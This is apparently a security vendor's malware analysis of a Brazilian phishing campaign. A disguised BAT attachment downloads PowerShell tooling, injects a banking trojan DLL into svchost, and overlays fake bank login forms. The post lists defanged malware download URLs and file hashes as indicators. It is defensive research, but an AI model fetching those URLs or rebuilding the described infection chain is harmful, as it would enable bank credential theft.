Sneaky .BAT File Leads to Spoofed Banking Page

If you thought using BAT files was old hat, think again. While monitoring our Secure Email Gateway Cloud service, we came across several suspect spam emails targeting Brazilian users. The figure below shows email details to trick and entice users to open the attachment.

The word "paulistana" is used for 'things that belong, or are coming from, São Paulo' thus making it more appealing to unsuspecting users.

Here is the English Translation:

Subject: Attached is São Paulo's fiscal note, N – 7632630091

Body:

Attached is the invoice of the provision of services

Regards Josa Martins

Phone (11) 99876-6625

Attachment: Nota Fiscal - Pauline City Hall.zip

The attached ZIP file holds a batch file which is intentionally UTF-16 encoded. When opened on a text editor it shows some traditional Chinese characters.



A byte order mark (BOM) of 0xFEFF is placed at the start of the file (signifies start of a Unicode text stream) that effectively hides the batch codes. However, here's how it looks in a hex-editor:

Analyzing the batch file uncovers the following behavior:

Initially creates a directory on C:\{random_directory_name}

Using PowerShell commands, it downloads a PowerShell Script and the PShellExec.exe.

By using the PShellExe.exe, it will first encrypt the downloaded PowerShell script, delete the original one and runs the encrypted script.

Lastly, it will create a VBScript that allows for the execution of the encrypted PowerShell script. For persistence it will create a symbolic link in the STARTUP Folder.

Analyzing the PowerShell Script:

As an initial impression, the script appears to use an existing PowerShell Script written by Matthew Graeber. It is also known as the PowerSyringe, a PowerShell-based Code/DLL Injection module. The threat actors basically append some of the following code:

Generates random characters to be used to create directories.

Checks the OS version if 32bit or 64bit and downloads the corresponding DLL. Decoded Base64 Links: hxxp://panel-anonimato.cf/TMP/Dexter/Arquiteto.64.dll

hxxp://panel-anonimato.cf/TMP/Dexter/Arquiteto.dll Using the PowerSyringe Module, it injects the DLL to svchost.exe

Injected DLL – The MultiBanker Trojan

Once the DLL is properly injected to svchost.exe it starts to monitor the user's activity to see if they try to access Brazilian banks. Once a user visits the online banking sites, it will overlay the screen with a fake form that enable the attackers to retrieve the user's PIN codes.

Here are the following banks and the fake forms that are used to overlay the screen:

Banrisul

Itaú Unibanco

Banco do Nordeste

Banco Santander

Sicoob

Sicredi

Indicators of Compromise:

Nota-Fiscal - Prefeitura Paulistana.bat - attached from an email

MD5: 70EA097616DFC8D4AE8B8AD4BDB1CD96

SHA1: E830EC9F194BF72740D9AB62B633E0862E18A143

Ma{username}.vbs - created by batch file

MD5: 7FDD656E476FC4AEFF19609FD14FB070

SHA1: 451515709EEE19D680A622753CB6802056ED84A5

1.ps1 - downloaded

MD5: BA0239533DD7F85CB0D1DF58FC129222

SHA1: 7366B78713808D4A23C9FC8B141D1DF1C2FB1FED

{random}.ps1.bin - encoded 1.ps1

MD5: BAFAEBF21A288826525BA0703EFC384B

SHA1: A4049F8FE337D148B25DD60AA7F1BF9E783538DD

PShellExec.exe - downloaded

MD5: B34B92270968DB55AB07633C11AD0883

SHA1: EF2AB66243F385559792ED6360D4A5C0D435C328

Arquiteto.64.dll - downloaded - for x64 machines

MD5: ED053046882301A893DDA1171D62DD50

SHA1: 0A1731A6D594C908866A9A317DE9AAA1BADD3AB1

Arquiteto.dll - downloaded - for x86 machines

MD5: E94EA2673908D605F08C6A6D666DC97E

SHA1: 836C0521DF76EDF48447CA1218DFBF3725010F51